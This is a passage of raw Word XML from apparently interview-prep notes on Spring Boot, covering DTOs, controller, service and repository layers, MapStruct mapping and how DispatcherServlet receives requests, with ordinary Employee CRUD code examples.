        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083D2E58"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setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27ADC0"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341790A"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD49C0" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9331C6"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ring getDepartment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E96FC4"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department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E718F58"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594CDFB" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AED3B4"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setDepartment(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC58BC"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his.department = department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE514EA"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0B602F13"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03FAAC1F"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Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A9C7ED"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 the controller, when handling a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you typically create and return the DTO instead of domain entities. The controller layer is responsible for receiving requests, processing them using the service layer, and returning the appropriate response (usually a DTO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06679E73"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For example, a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request that retrieves an employee might return a EmployeeDTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503662F7"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 Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F789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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22432BE7"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questMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F802FB"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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697044B" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8C720F"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390087DC"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EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468D7AA" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25267F4F"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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEB86A"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ResponseEntity&lt;EmployeeDTO&gt; getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125959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mployeeDTO employeeDTO = employeeService.getEmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9C9C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ResponseEntity.ok(employeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFC3F8"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113DDCA9" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D46F186"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC6902"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ResponseEntity&lt;EmployeeDTO&gt; createEmployee(@RequestBody EmployeeDTO employeeDTO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72456EE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mployeeDTO createdEmployee = employeeService.createEmployee(employeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD8E61"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ResponseEntity.status(HttpStatus.CREATED).body(createdEmployee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C0B0F"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4C1126F9"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9110735"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Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E538C"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 the service layer, you handle the business logic and may interact with the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to fetch data from the database. The service layer then converts entities to DTOs and vice versa using either manual mapping or a library like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MapStruct</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ModelMapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7ECCA"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 Service</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73CD6F"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D032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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FA5BF" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D66667"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40236B57"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D9ADFE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF4A465"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EmployeeDTO getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A53763B"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mployee employee = employeeRepository.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB9078"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rElseThrow(() -&gt; new ResourceNotFoundException("Employee not found"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E124009"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Convert entity to DTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F5715"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EmployeeDTO(employee.getId(), employee.getName(), employee.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2CBB36"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6B16E6BF" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689F2F4F"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EmployeeDTO createEmployee(EmployeeDTO employeeDTO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6E8B4"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Convert DTO to entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A16A8"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 xml:space="preserve">        Employee employee = new Employee(employeeDTO.getId(), employeeDTO.getName(), employeeDTO.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC41FFF"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mployee = employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C41D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Convert entity back to DTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047BF63"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EmployeeDTO(employee.getId(), employee.getName(), employee.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85F55B"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D228D56"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7194E5F8"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4. Repository Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847511A"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repository layer is responsible for interacting with the database. You can use Spring Data JPA or any other persistence mechanism to save or retrieve the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF55F1"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 Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7890F65C"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C481244"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1BBC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Custom queries can be added here if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBEA67B"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2C056B97"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5. Mapping DTO to Entity (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD4E74"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 more complex applications, you may want to use a mapping framework like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MapStruct</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ModelMapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automate the conversion between DTOs and entities. This helps avoid repetitive code for manual conversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7A6BD"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MapStruct</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a compile-time code generator that simplifies the implementation of mappings between Java bean types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06845809"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ModelMapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a runtime mapping library that can automatically map DTOs and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E320DAA"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For example, using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MapStruct</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0142F5AC"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MapStruct Mapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D782D5"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Mapper(componentModel = "spring")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2D375"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interface EmployeeMapper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37300A" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3ADCE0"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mployeeDTO toEmployeeDTO(Employee employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40387722" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513F33A2"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mployee toEmployee(EmployeeDTO employeeDTO);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACB75B"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7D02C7F1"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this case, you can directly inject the EmployeeMapper into your service layer and use it for mapping between DTOs and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD56FE"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6. Handling the Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF4FF9"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Finally, when the controller returns the DTO, it is automatically serialized into JSON (or XML, depending on the configuration) and sent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BED7A"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Full Example Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582626C"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lient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a GET request to http://localhost:8080/api/employees/{id}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606A1E1"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ispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> routes the request to the corresponding controller method EmployeeController#getEmployee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CE3A5"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mployeeService</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is called by the controller to fetch data for the employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35FF8B"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service layer converts the entity to a DTO (EmployeeDTO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B993FBB"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controller returns the EmployeeDTO in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112EA04F"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ring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serializes the DTO to JSON and sends it back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C8B317"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ample Response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JSON format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B62A1"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18539C33"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BFE9B"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D837559"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department": "Engineering"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739A688"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9B68905"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB367F3"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 Spring Boot, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DTOs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are invoked and used in </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA794AA"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Defining the DTO as a simple POJO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF313A"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ing the controller to return DTOs as responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B102E19"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service layer processes business logic and maps entities to DTOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C55F7B"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You can optionally use mapping libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MapStruct</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ModelMapper</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better code management and automatic mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECC8D3"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By using DTOs, you ensure that the client only receives the necessary data and your internal domain structure remains abstracted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C28FF" w14:textId="579B38AE"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61F3E05">
          <v:rect id="_x0000_i2676" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378AD86" w14:textId="16E92656" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="641" w:name="_Toc196308121"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I have a URL and I hit the URL, so which is the first class which is invoked in our product</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="641"/>
    </w:p>
    <w:p w14:paraId="3A10F9B1" w14:textId="2DECC0A1" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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a Spring Boot application, when you hit a URL (i.e., send an HTTP request), the request is processed through a chain of components in the application. Here's the sequence of classes/components that are invoked when a request is received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847DE0F"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DispatcherServlet (Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EA85C"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First Class Invoked:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the front controller in the Spring MVC framework, and it is the first class to receive the HTTP request when a URL is hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DB322"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t is defined in the web.xml (if the application is not using Spring Boot) or automatically registered by Spring Boot (if you're using Spring Boot’s embedded servlet container).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DCD6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DispatcherServlet is responsible for routing the request to the appropriate controller and view resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FEEA00"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Key Role:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It acts as a dispatcher to route the request to the appropriate controller based on the request URL and method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263D159"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 a Spring Boot application, DispatcherServlet is automatically configured and initialized by the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Auto-Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
